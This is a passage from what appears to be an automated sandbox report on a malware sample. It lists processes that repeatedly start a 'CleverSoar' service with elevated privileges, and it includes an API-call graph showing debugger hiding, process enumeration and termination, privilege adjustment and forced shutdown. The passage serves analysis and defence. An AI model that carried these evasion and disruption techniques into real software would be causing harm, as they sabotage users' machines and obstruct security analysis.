                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:105
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:106
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:107
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:108
                            Start time:23:01:58
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:267
                            Start time:23:02:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:2.3%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.5%
                              Total number of Nodes:818
                              Total number of Limit Nodes:9
                              execution_graph 66527 6c23cad3 66528 6c23cae5 __dosmaperr 66527->66528 66529 6c23cafd 66527->66529 66529->66528 66530 6c23cb48 __dosmaperr 66529->66530 66531 6c23cb77 66529->66531 66574 6c230120 18 API calls __fassign 66530->66574 66533 6c23cb90 66531->66533 66535 6c23cbe7 __wsopen_s 66531->66535 66536 6c23cbab __dosmaperr 66531->66536 66534 6c23cb95 66533->66534 66533->66536 66562 6c2419e5 66534->66562 66568 6c2347bb HeapFree GetLastError _free 66535->66568 66567 6c230120 18 API calls __fassign 66536->66567 66538 6c23cd3e 66540 6c23cdb4 66538->66540 66543 6c23cd57 GetConsoleMode 66538->66543 66545 6c23cdb8 ReadFile 66540->66545 66541 6c23cc07 66569 6c2347bb HeapFree GetLastError _free 66541->66569 66543->66540 66548 6c23cd68 66543->66548 66546 6c23cdd2 66545->66546 66547 6c23ce2c GetLastError 66545->66547 66546->66547 66550 6c23cda9 66546->66550 66559 6c23cbc2 __dosmaperr __wsopen_s 66547->66559 66548->66545 66551 6c23cd6e ReadConsoleW 66548->66551 66549 6c23cc0e 66549->66559 66570 6c23ac69 20 API calls __wsopen_s 66549->66570 66555 6c23cdf7 66550->66555 66556 6c23ce0e 66550->66556 66550->66559 66551->66550 66553 6c23cd8a GetLastError 66551->66553 66553->66559 66572 6c23cefe 23 API calls 3 library calls 66555->66572 66558 6c23ce25 66556->66558 66556->66559 66573 6c23d1b6 21 API calls __wsopen_s 66558->66573 66571 6c2347bb HeapFree GetLastError _free 66559->66571 66561 6c23ce2a 66561->66559 66563 6c2419f2 66562->66563 66565 6c2419ff 66562->66565 66563->66538 66564 6c241a0b 66564->66538 66565->66564 66575 6c230120 18 API calls __fassign 66565->66575 66567->66559 66568->66541 66569->66549 66570->66534 66571->66528 66572->66559 66573->66561 66574->66528 66575->66563 66576 6c0a3d62 66578 6c0a3bc0 66576->66578 66577 6c0a3e8a GetCurrentThread NtSetInformationThread 66579 6c0a3eea 66577->66579 66578->66577 66580 6c0a4b53 66738 6c226a43 66580->66738 66582 6c0a4b5c _Yarn 66752 6c21aec0 66582->66752 66584 6c0c639e 66850 6c230130 18 API calls 2 library calls 66584->66850 66586 6c0a5164 CreateFileA CloseHandle 66592 6c0a51ec 66586->66592 66587 6c0a4cff 66588 6c0a4bae std::ios_base::_Ios_base_dtor 66588->66584 66588->66586 66588->66587 66589 6c0b245a _Yarn _strlen 66588->66589 66589->66584 66591 6c21aec0 2 API calls 66589->66591 66606 6c0b2a83 std::ios_base::_Ios_base_dtor 66591->66606 66758 6c225120 OpenSCManagerA 66592->66758 66594 6c0afc00 66843 6c225240 CreateToolhelp32Snapshot 66594->66843 66597 6c226a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66634 6c0a5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 66597->66634 66599 6c0b37d0 Sleep 66644 6c0b37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 66599->66644 66600 6c21aec0 2 API calls 66600->66634 66601 6c0c63b2 66851 6c0a15e0 18 API calls std::ios_base::_Ios_base_dtor 66601->66851 66602 6c225240 4 API calls 66620 6c0b053a 66602->66620 66603 6c225240 4 API calls 66629 6c0b12e2 66603->66629 66605 6c0c64f8 66606->66584 66762 6c210390 66606->66762 66607 6c0affe3 66607->66602 66613 6c0b0abc 66607->66613 66608 6c0c6ba0 104 API calls 66608->66634 66609 6c0c6e60 32 API calls 66609->66634 66612 6c225240 4 API calls 66612->66613 66613->66589 66613->66603 66614 6c225240 4 API calls 66633 6c0b1dd9 66614->66633 66615 6c0b211c 66615->66589 66617 6c0b241a 66615->66617 66619 6c210390 11 API calls 66617->66619 66618 6c21aec0 2 API calls 66618->66644 66622 6c0b244d 66619->66622 66620->66612 66620->66613 66621 6c0a6722 66819 6c221880 25 API calls 4 library calls 66621->66819 66849 6c225d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66622->66849 66624 6c0b2452 Sleep 66624->66589 66625 6c0b16ac 66626 6c0a6162 66628 6c0a740b 66820 6c224ff0 CreateProcessA 66628->66820 66629->66614 66629->66615 66629->66625 66630 6c225240 4 API calls 66630->66615 66633->66615 66633->66630 66634->66584 66634->66594 66634->66597 66634->66600 66634->66608 66634->66609 66634->66621 66634->66626 66800 6c0c7090 66634->66800 66813 6c0ee010 66634->66813 66635 6c0c7090 77 API calls 66635->66644 66636 6c0ee010 67 API calls 66636->66644 66637 6c0a775a _strlen 66637->66584 66638 6c0a7ba9 66637->66638 66639 6c0a7b92 66637->66639 66642 6c0a7b43 _Yarn 66637->66642 66641 6c226a43 std::_Facet_Register 4 API calls 66638->66641 66640 6c226a43 std::_Facet_Register 4 API calls 66639->66640 66640->66642 66641->66642 66643 6c21aec0 2 API calls 66642->66643 66653 6c0a7be7 std::ios_base::_Ios_base_dtor 66643->66653 66644->66584 66644->66618 66644->66635 66644->66636 66771 6c0c6ba0 66644->66771 66790 6c0c6e60 66644->66790 66645 6c224ff0 4 API calls 66656 6c0a8a07 66645->66656 66646 6c0a9d68 66648 6c226a43 std::_Facet_Register 4 API calls 66646->66648 66647 6c0a9d7f 66649 6c226a43 std::_Facet_Register 4 API calls 66647->66649 66651 6c0a9d18 _Yarn 66648->66651 66649->66651 66650 6c0a962c _strlen 66650->66584 66650->66646 66650->66647 66650->66651 66652 6c21aec0 2 API calls 66651->66652 66660 6c0a9dbd std::ios_base::_Ios_base_dtor 66652->66660 66653->66584 66653->66645 66653->66650 66654 6c0a8387 66653->66654 66655 6c224ff0 4 API calls 66664 6c0a9120 66655->66664 66656->66655 66657 6c224ff0 4 API calls 66674 6c0aa215 _strlen 66657->66674 66658 6c224ff0 4 API calls 66659 6c0a9624 66658->66659 66824 6c225d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66659->66824 66660->66584 66660->66657 66665 6c0ae8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 66660->66665 66661 6c226a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66661->66665 66663 6c21aec0 2 API calls 66663->66665 66664->66658 66665->66584 66665->66661 66665->66663 66666 6c0aed02 Sleep 66665->66666 66667 6c0af7b1 66665->66667 66686 6c0ae8c1 66666->66686 66842 6c225d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66667->66842 66669 6c0aa9bb 66673 6c226a43 std::_Facet_Register 4 API calls 66669->66673 66670 6c0aa9a4 66672 6c226a43 std::_Facet_Register 4 API calls 66670->66672 66671 6c0ae8dd GetCurrentProcess TerminateProcess 66671->66665 66681 6c0aa953 _Yarn _strlen 66672->66681 66673->66681 66674->66584 66674->66669 66674->66670 66674->66681 66675 6c224ff0 4 API calls 66675->66686 66676 6c0afbb8 66677 6c0afbe8 ExitWindowsEx Sleep 66676->66677 66677->66594 66678 6c0af7c0 66678->66676 66679 6c0ab009 66683 6c226a43 std::_Facet_Register 4 API calls 66679->66683 66680 6c0aaff0 66682 6c226a43 std::_Facet_Register 4 API calls 66680->66682 66681->66601 66681->66679 66681->66680 66684 6c0aafa0 _Yarn 66681->66684 66682->66684 66683->66684 66825 6c225960 66684->66825 66686->66665 66686->66671 66686->66675 66687 6c0ab059 std::ios_base::_Ios_base_dtor _strlen 66687->66584 66688 6c0ab42c 66687->66688 66689 6c0ab443 66687->66689 66692 6c0ab3da _Yarn _strlen 66687->66692 66690 6c226a43 std::_Facet_Register 4 API calls 66688->66690 66691 6c226a43 std::_Facet_Register 4 API calls 66689->66691 66690->66692 66691->66692 66692->66601 66693 6c0ab79e 66692->66693 66694 6c0ab7b7 66692->66694 66697 6c0ab751 _Yarn 66692->66697 66695 6c226a43 std::_Facet_Register 4 API calls 66693->66695 66696 6c226a43 std::_Facet_Register 4 API calls 66694->66696 66695->66697 66696->66697 66698 6c225960 104 API calls 66697->66698 66699 6c0ab804 std::ios_base::_Ios_base_dtor _strlen 66698->66699 66699->66584 66700 6c0abc0f 66699->66700 66701 6c0abc26 66699->66701 66704 6c0abbbd _Yarn _strlen 66699->66704 66702 6c226a43 std::_Facet_Register 4 API calls 66700->66702 66703 6c226a43 std::_Facet_Register 4 API calls 66701->66703 66702->66704 66703->66704 66704->66601 66705 6c0ac08e 66704->66705 66706 6c0ac075 66704->66706 66709 6c0ac028 _Yarn 66704->66709 66708 6c226a43 std::_Facet_Register 4 API calls 66705->66708 66707 6c226a43 std::_Facet_Register 4 API calls 66706->66707 66707->66709 66708->66709 66710 6c225960 104 API calls 66709->66710 66715 6c0ac0db std::ios_base::_Ios_base_dtor _strlen 66710->66715 66711 6c0ac7bc 66714 6c226a43 std::_Facet_Register 4 API calls 66711->66714 66712 6c0ac7a5 66713 6c226a43 std::_Facet_Register 4 API calls 66712->66713 66722 6c0ac753 _Yarn _strlen 66713->66722 66714->66722 66715->66584 66715->66711 66715->66712 66715->66722 66716 6c0ad3ed 66718 6c226a43 std::_Facet_Register 4 API calls 66716->66718 66717 6c0ad406 66719 6c226a43 std::_Facet_Register 4 API calls 66717->66719 66720 6c0ad39a _Yarn 66718->66720 66719->66720 66721 6c225960 104 API calls 66720->66721 66723 6c0ad458 std::ios_base::_Ios_base_dtor _strlen 66721->66723 66722->66601 66722->66716 66722->66717 66722->66720 66728 6c0acb2f 66722->66728 66723->66584 66724 6c0ad8bb 66723->66724 66725 6c0ad8a4 66723->66725 66729 6c0ad852 _Yarn _strlen 66723->66729 66727 6c226a43 std::_Facet_Register 4 API calls 66724->66727 66726 6c226a43 std::_Facet_Register 4 API calls 66725->66726 66726->66729 66727->66729 66729->66601 66730 6c0adccf 66729->66730 66731 6c0adcb6 66729->66731 66734 6c0adc69 _Yarn 66729->66734 66733 6c226a43 std::_Facet_Register 4 API calls 66730->66733 66732 6c226a43 std::_Facet_Register 4 API calls 66731->66732 66732->66734 66733->66734 66735 6c225960 104 API calls 66734->66735 66737 6c0add1c std::ios_base::_Ios_base_dtor 66735->66737 66736 6c224ff0 4 API calls 66736->66665 66737->66584 66737->66736 66740 6c226a48 66738->66740 66739 6c226a62 66739->66582 66740->66739 66743 6c226a64 std::_Facet_Register 66740->66743 66852 6c22f014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66740->66852 66742 6c2278c3 std::_Facet_Register 66856 6c229379 RaiseException 66742->66856 66743->66742 66853 6c229379 RaiseException 66743->66853 66745 6c2280bc IsProcessorFeaturePresent 66750 6c2280e1 66745->66750 66747 6c227883 66854 6c229379 RaiseException 66747->66854 66749 6c2278a3 std::invalid_argument::invalid_argument 66855 6c229379 RaiseException 66749->66855 66750->66582 66753 6c21aed4 66752->66753 66754 6c21aed6 FindFirstFileA 66752->66754 66753->66754 66755 6c21af10 66754->66755 66756 6c21af14 FindClose 66755->66756 66757 6c21af72 66755->66757 66756->66755 66757->66588 66759 6c225156 66758->66759 66760 6c2251e8 OpenServiceA 66759->66760 66761 6c22522f 66759->66761 66760->66759 66761->66634 66767 6c2103a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 66762->66767 66763 6c21310e CloseHandle 66763->66767 66764 6c213f5f CloseHandle 66764->66767 66765 6c21251b CloseHandle 66765->66767 66766 6c0b37cb 66770 6c225d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66766->66770 66767->66763 66767->66764 66767->66765 66767->66766 66768 6c1fc1e0 WriteFile WriteFile WriteFile ReadFile 66767->66768 66857 6c1fb730 66767->66857 66768->66767 66770->66599 66772 6c0c6bd5 66771->66772 66868 6c0f2020 66772->66868 66774 6c0c6c68 66775 6c226a43 std::_Facet_Register 4 API calls 66774->66775 66776 6c0c6ca0 66775->66776 66885 6c227327 66776->66885 66778 6c0c6cb4 66897 6c0f1d90 66778->66897 66781 6c0c6d8e 66781->66644 66783 6c0c6dc8 66905 6c0f26e0 24 API calls 4 library calls 66783->66905 66785 6c0c6dda 66906 6c229379 RaiseException 66785->66906 66787 6c0c6def 66788 6c0ee010 67 API calls 66787->66788 66789 6c0c6e0f 66788->66789 66789->66644 66791 6c0c6e9f 66790->66791 66795 6c0c6eb3 66791->66795 67296 6c0f3560 32 API calls std::_Xinvalid_argument 66791->67296 66792 6c0c6f5b 66796 6c0c6f6e 66792->66796 67297 6c0f37e0 32 API calls std::_Xinvalid_argument 66792->67297 66795->66792 67298 6c0f2250 30 API calls 66795->67298 67299 6c0f26e0 24 API calls 4 library calls 66795->67299 67300 6c229379 RaiseException 66795->67300 66796->66644 66801 6c0c709e 66800->66801 66804 6c0c70d1 66800->66804 67301 6c0f01f0 66801->67301 66802 6c0c7183 66802->66634 66804->66802 67305 6c0f2250 30 API calls 66804->67305 66807 6c230b18 67 API calls 66807->66804 66808 6c0c71ae 67306 6c0f2340 24 API calls 66808->67306 66810 6c0c71be 67307 6c229379 RaiseException 66810->67307 66812 6c0c71c9 66814 6c0ee04b 66813->66814 66815 6c0ee0a3 66814->66815 66816 6c0f01f0 64 API calls 66814->66816 66815->66634 66817 6c0ee098 66816->66817 66818 6c230b18 67 API calls 66817->66818 66818->66815 66819->66628 66821 6c2250ca 66820->66821 66822 6c225080 WaitForSingleObject CloseHandle CloseHandle 66821->66822 66823 6c2250e3 66821->66823 66822->66821 66823->66637 66824->66650 66826 6c2259b7 66825->66826 67353 6c225ff0 66826->67353 66828 6c2259c8 66829 6c0c6ba0 104 API calls 66828->66829 66834 6c2259ec 66829->66834 66830 6c0ee010 67 API calls 66831 6c225a9f std::ios_base::_Ios_base_dtor 66830->66831 66835 6c0ee010 67 API calls 66831->66835 66833 6c225a54 67390 6c225b90 66833->67390 66834->66833 66841 6c225a67 66834->66841 67372 6c226340 66834->67372 67380 6c102000 66834->67380 66839 6c225ae2 std::ios_base::_Ios_base_dtor 66835->66839 66838 6c225a5c 66840 6c0c7090 77 API calls 66838->66840 66839->66687 66840->66841 66841->66830 66842->66678 66846 6c2252a0 std::locale::_Setgloballocale 66843->66846 66844 6c225277 CloseHandle 66844->66846 66845 6c225320 Process32NextW 66845->66846 66846->66844 66846->66845 66847 6c2253b1 66846->66847 66848 6c225345 Process32FirstW 66846->66848 66847->66607 66848->66846 66849->66624 66851->66605 66852->66740 66853->66747 66854->66749 66855->66742 66856->66745 66858 6c1fb743 _Yarn __wsopen_s std::locale::_Setgloballocale 66857->66858 66859 6c1fc180 66858->66859 66860 6c1fbced CreateFileA 66858->66860 66862 6c1faa30 66858->66862 66859->66767 66860->66858 66865 6c1faa43 __wsopen_s std::locale::_Setgloballocale 66862->66865 66863 6c1fb3e9 WriteFile 66863->66865 66864 6c1fb43d WriteFile 66864->66865 66865->66863 66865->66864 66866 6c1fb718 66865->66866 66867 6c1fab95 ReadFile 66865->66867 66866->66858 66867->66865 66869 6c226a43 std::_Facet_Register 4 API calls 66868->66869 66870 6c0f207e 66869->66870 66871 6c227327 43 API calls 66870->66871 66872 6c0f2092 66871->66872 66907 6c0f2f60 42 API calls 4 library calls 66872->66907 66874 6c0f210d 66877 6c0f2120 66874->66877 66908 6c226f8e 9 API calls 2 library calls 66874->66908 66875 6c0f20c8 66875->66874 66876 6c0f2136 66875->66876 66909 6c0f2250 30 API calls 66876->66909 66877->66774 66880 6c0f215b 66910 6c0f2340 24 API calls 66880->66910 66882 6c0f2171 66911 6c229379 RaiseException 66882->66911 66884 6c0f217c 66884->66774 66886 6c227333 __EH_prolog3 66885->66886 66912 6c226eb5 66886->66912 66891 6c227351 66926 6c2273ba 39 API calls std::locale::_Setgloballocale 66891->66926 66892 6c22736f 66918 6c226ee6 66892->66918 66893 6c2273ac 66893->66778 66895 6c227359 66927 6c2271b1 HeapFree GetLastError _Yarn 66895->66927 66898 6c0f1ddc 66897->66898 66899 6c0c6d5d 66897->66899 66932 6c227447 66898->66932 66899->66781 66904 6c0f2250 30 API calls 66899->66904 66903 6c0f1e82 66904->66783 66905->66785 66906->66787 66907->66875 66908->66877 66909->66880 66910->66882 66911->66884 66913 6c226ec4 66912->66913 66914 6c226ecb 66912->66914 66928 6c2303cd 6 API calls std::_Lockit::_Lockit 66913->66928 66916 6c226ec9 66914->66916 66929 6c22858b EnterCriticalSection 66914->66929 66916->66892 66925 6c227230 6 API calls 2 library calls 66916->66925 66919 6c226ef0 66918->66919 66920 6c2303db 66918->66920 66924 6c226f03 66919->66924 66930 6c228599 LeaveCriticalSection 66919->66930 66931 6c2303b6 LeaveCriticalSection 66920->66931 66923 6c2303e2 66923->66893 66924->66893 66925->66891 66926->66895 66927->66892 66928->66916 66929->66916 66930->66924 66931->66923 66933 6c227450 66932->66933 66934 6c0f1dea 66933->66934 66941 6c22fd4a 66933->66941 66934->66899 66940 6c22c563 18 API calls __fassign 66934->66940 66936 6c22749c 66936->66934 66952 6c22fa58 65 API calls 66936->66952 66938 6c2274b7 66938->66934 66953 6c230b18 66938->66953 66940->66903 66943 6c22fd55 __wsopen_s 66941->66943 66942 6c22fd68 66978 6c230120 18 API calls __fassign 66942->66978 66943->66942 66944 6c22fd88 66943->66944 66948 6c22fd78 66944->66948 66964 6c23ae0c 66944->66964 66948->66936 66952->66938 66954 6c230b24 __wsopen_s 66953->66954 66955 6c230b43 66954->66955 66956 6c230b2e 66954->66956 66960 6c230b3e 66955->66960 67159 6c22c5a9 EnterCriticalSection 66955->67159 67174 6c230120 18 API calls __fassign 66956->67174 66959 6c230b60 67160 6c230b9c 66959->67160 66960->66934 66962 6c230b6b 67175 6c230b92 LeaveCriticalSection 66962->67175 66965 6c23ae18 __wsopen_s 66964->66965 66980 6c23039f EnterCriticalSection 66965->66980 66967 6c23ae26 66981 6c23aeb0 66967->66981 66972 6c23af72 66973 6c23b091 66972->66973 67005 6c23b114 66973->67005 66977 6c22fdcc 66979 6c22fdf5 LeaveCriticalSection 66977->66979 66978->66948 66979->66948 66980->66967 66982 6c23aed3 66981->66982 66983 6c23af2b 66982->66983 66990 6c23ae33 66982->66990 66998 6c22c5a9 EnterCriticalSection 66982->66998 66999 6c22c5bd LeaveCriticalSection 66982->66999 67000 6c2371e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 66983->67000 66985 6c23af34 67001 6c2347bb HeapFree GetLastError _free 66985->67001 66988 6c23af3d 66988->66990 67002 6c236c1f 6 API calls std::_Lockit::_Lockit 66988->67002 66995 6c23ae6c 66990->66995 66992 6c23af5c 67003 6c22c5a9 EnterCriticalSection 66992->67003 66994 6c23af6f 66994->66990 67004 6c2303b6 LeaveCriticalSection 66995->67004 66997 6c22fda3 66997->66948 66997->66972 66998->66982 66999->66982 67000->66985 67001->66988 67002->66992 67003->66994 67004->66997 67006 6c23b133 67005->67006 67007 6c23b146 67006->67007 67011 6c23b15b 67006->67011 67021 6c230120 18 API calls __fassign 67007->67021 67009 6c23b0a7 67009->66977 67018 6c243fde 67009->67018 67016 6c23b27b 67011->67016 67022 6c243ea8 37 API calls __fassign 67011->67022 67013 6c23b2cb 67013->67016 67023 6c243ea8 37 API calls __fassign 67013->67023 67015 6c23b2e9 67015->67016 67024 6c243ea8 37 API calls __fassign 67015->67024 67016->67009 67025 6c230120 18 API calls __fassign 67016->67025 67026 6c244396 67018->67026 67021->67009 67022->67013 67023->67015 67024->67016 67025->67009 67028 6c2443a2 __wsopen_s 67026->67028 67027 6c2443a9 67044 6c230120 18 API calls __fassign 67027->67044 67028->67027 67029 6c2443d4 67028->67029 67035 6c243ffe 67029->67035 67034 6c243ff9 67034->66977 67046 6c2306cb 67035->67046 67039 6c244034 67042 6c244066 67039->67042 67086 6c2347bb HeapFree GetLastError _free 67039->67086 67045 6c24442b LeaveCriticalSection __wsopen_s 67042->67045 67044->67034 67045->67034 67087 6c22bceb 67046->67087 67049 6c2306ef 67051 6c22bdf6 67049->67051 67096 6c22be4e 67051->67096 67053 6c22be0e 67053->67039 67054 6c24406c 67053->67054 67111 6c2444ec 67054->67111 67060 6c244192 GetFileType 67063 6c2441e4 67060->67063 67064 6c24419d GetLastError 67060->67064 67061 6c24409e __dosmaperr 67061->67039 67062 6c244167 GetLastError 67062->67061 67141 6c2417b0 SetStdHandle __dosmaperr __wsopen_s 67063->67141 67140 6c22f9f2 __dosmaperr _free 67064->67140 67065 6c244115 67065->67060 67065->67062 67139 6c244457 CreateFileW 67065->67139 67068 6c2441ab CloseHandle 67068->67061 67083 6c2441d4 67068->67083 67070 6c24415a 67070->67060 67070->67062 67071 6c244205 67072 6c244251 67071->67072 67142 6c244666 70 API calls 2 library calls 67071->67142 67077 6c244258 67072->67077 67156 6c244710 70 API calls 2 library calls 67072->67156 67075 6c244286 67076 6c244294 67075->67076 67075->67077 67076->67061 67079 6c244310 CloseHandle 67076->67079 67143 6c23b925 67077->67143 67157 6c244457 CreateFileW 67079->67157 67081 6c24433b 67082 6c244345 GetLastError 67081->67082 67081->67083 67084 6c244351 __dosmaperr 67082->67084 67083->67061 67158 6c24171f SetStdHandle __dosmaperr __wsopen_s 67084->67158 67086->67042 67088 6c22bd0b 67087->67088 67094 6c22bd02 67087->67094 67089 6c2349b2 __Getctype 37 API calls 67088->67089 67088->67094 67090 6c22bd2b 67089->67090 67091 6c234f28 __Getctype 37 API calls 67090->67091 67092 6c22bd41 67091->67092 67093 6c234f55 __fassign 37 API calls 67092->67093 67093->67094 67094->67049 67095 6c2369d5 5 API calls std::_Lockit::_Lockit 67094->67095 67095->67049 67097 6c22be76 67096->67097 67098 6c22be5c 67096->67098 67099 6c22be9c 67097->67099 67100 6c22be7d 67097->67100 67101 6c22bddc __wsopen_s HeapFree GetLastError 67098->67101 67103 6c234843 __fassign MultiByteToWideChar 67099->67103 67102 6c22be66 __dosmaperr 67100->67102 67104 6c22bd9d __wsopen_s HeapFree GetLastError 67100->67104 67101->67102 67102->67053 67105 6c22beab 67103->67105 67104->67102 67106 6c22beb2 GetLastError 67105->67106 67107 6c22bd9d __wsopen_s HeapFree GetLastError 67105->67107 67109 6c22bed8 67105->67109 67106->67102 67107->67109 67108 6c234843 __fassign MultiByteToWideChar 67110 6c22beef 67108->67110 67109->67102 67109->67108 67110->67102 67110->67106 67112 6c244527 67111->67112 67113 6c24450d 67111->67113 67114 6c24447c __wsopen_s 18 API calls 67112->67114 67113->67112 67115 6c230120 __fassign 18 API calls 67113->67115 67118 6c24455f 67114->67118 67115->67112 67116 6c24458e 67117 6c245911 __wsopen_s 18 API calls 67116->67117 67122 6c244089 67116->67122 67119 6c2445dc 67117->67119 67118->67116 67121 6c230120 __fassign 18 API calls 67118->67121 67120 6c244659 67119->67120 67119->67122 67123 6c23014d __Getctype 11 API calls 67120->67123 67121->67116 67122->67061 67125 6c24160c 67122->67125 67124 6c244665 67123->67124 67126 6c241618 __wsopen_s 67125->67126 67127 6c23039f std::_Lockit::_Lockit EnterCriticalSection 67126->67127 67128 6c24161f 67127->67128 67129 6c241644 67128->67129 67134 6c2416b3 EnterCriticalSection 67128->67134 67136 6c241666 67128->67136 67131 6c241842 __wsopen_s 11 API calls 67129->67131 67130 6c241716 __wsopen_s LeaveCriticalSection 67132 6c241686 67130->67132 67133 6c241649 67131->67133 67132->67061 67138 6c244457 CreateFileW 67132->67138 67133->67136 67137 6c241990 __wsopen_s EnterCriticalSection 67133->67137 67135 6c2416c0 LeaveCriticalSection 67134->67135 67134->67136 67135->67128 67136->67130 67137->67136 67138->67065 67139->67070 67140->67068 67141->67071 67142->67072 67144 6c2415a2 __wsopen_s 18 API calls 67143->67144 67147 6c23b935 67144->67147 67145 6c23b93b 67146 6c24171f __wsopen_s SetStdHandle 67145->67146 67155 6c23b993 __dosmaperr 67146->67155 67147->67145 67148 6c23b96d 67147->67148 67149 6c2415a2 __wsopen_s 18 API calls 67147->67149 67148->67145 67150 6c2415a2 __wsopen_s 18 API calls 67148->67150 67152 6c23b964 67149->67152 67151 6c23b979 CloseHandle 67150->67151 67151->67145 67153 6c23b985 GetLastError 67151->67153 67154 6c2415a2 __wsopen_s 18 API calls 67152->67154 67153->67145 67154->67148 67155->67061 67156->67075 67157->67081 67158->67083 67159->66959 67161 6c230ba9 67160->67161 67162 6c230bbe 67160->67162 67198 6c230120 18 API calls __fassign 67161->67198 67166 6c230bb9 67162->67166 67176 6c230cb9 67162->67176 67166->66962 67170 6c230be1 67191 6c23b898 67170->67191 67172 6c230be7 67172->67166 67199 6c2347bb HeapFree GetLastError _free 67172->67199 67174->66960 67175->66960 67177 6c230cd1 67176->67177 67178 6c230bd3 67176->67178 67177->67178 67179 6c239c60 18 API calls 67177->67179 67182 6c23873e 67178->67182 67180 6c230cef 67179->67180 67200 6c23bb6c 67180->67200 67183 6c238755 67182->67183 67184 6c230bdb 67182->67184 67183->67184 67283 6c2347bb HeapFree GetLastError _free 67183->67283 67186 6c239c60 67184->67186 67187 6c239c81 67186->67187 67188 6c239c6c 67186->67188 67187->67170 67284 6c230120 18 API calls __fassign 67188->67284 67190 6c239c7c 67190->67170 67192 6c23b8be 67191->67192 67196 6c23b8a9 __dosmaperr 67191->67196 67193 6c23b8e5 67192->67193 67194 6c23b907 __dosmaperr 67192->67194 67285 6c23b9c1 67193->67285 67293 6c230120 18 API calls __fassign 67194->67293 67196->67172 67198->67166 67199->67166 67201 6c23bb78 __wsopen_s 67200->67201 67202 6c23bb80 __dosmaperr 67201->67202 67203 6c23bbca 67201->67203 67204 6c23bc33 __dosmaperr 67201->67204 67202->67178 67211 6c241990 EnterCriticalSection 67203->67211 67241 6c230120 18 API calls __fassign 67204->67241 67206 6c23bbd0 67208 6c23bbec __dosmaperr 67206->67208 67212 6c23bc5e 67206->67212 67240 6c23bc2b LeaveCriticalSection __wsopen_s 67208->67240 67211->67206 67213 6c23bc80 67212->67213 67239 6c23bc9c __dosmaperr 67212->67239 67214 6c23bcd4 67213->67214 67215 6c23bc84 __dosmaperr 67213->67215 67216 6c23bce7 67214->67216 67250 6c23ac69 20 API calls __wsopen_s 67214->67250 67249 6c230120 18 API calls __fassign 67215->67249 67242 6c23be40 67216->67242 67221 6c23bcfd 67223 6c23bd01 67221->67223 67224 6c23bd26 67221->67224 67222 6c23bd3c 67225 6c23bd50 67222->67225 67226 6c23bd95 WriteFile 67222->67226 67223->67239 67251 6c23c25b 6 API calls __wsopen_s 67223->67251 67252 6c23beb1 43 API calls 5 library calls 67224->67252 67229 6c23bd85 67225->67229 67230 6c23bd5b 67225->67230 67228 6c23bdb9 GetLastError 67226->67228 67226->67239 67228->67239 67255 6c23c2c3 7 API calls 2 library calls 67229->67255 67233 6c23bd60 67230->67233 67234 6c23bd75 67230->67234 67237 6c23bd65 67233->67237 67233->67239 67254 6c23c487 8 API calls 3 library calls 67234->67254 67236 6c23bd73 67236->67239 67253 6c23c39e 7 API calls 2 library calls 67237->67253 67239->67208 67240->67202 67241->67202 67243 6c2419e5 __wsopen_s 18 API calls 67242->67243 67244 6c23be51 67243->67244 67245 6c23bcf8 67244->67245 67256 6c2349b2 GetLastError 67244->67256 67245->67221 67245->67222 67248 6c23be8e GetConsoleMode 67248->67245 67249->67239 67250->67216 67251->67239 67252->67239 67253->67236 67254->67236 67255->67236 67257 6c2349cf 67256->67257 67258 6c2349c9 67256->67258 67259 6c236b62 __Getctype 6 API calls 67257->67259 67262 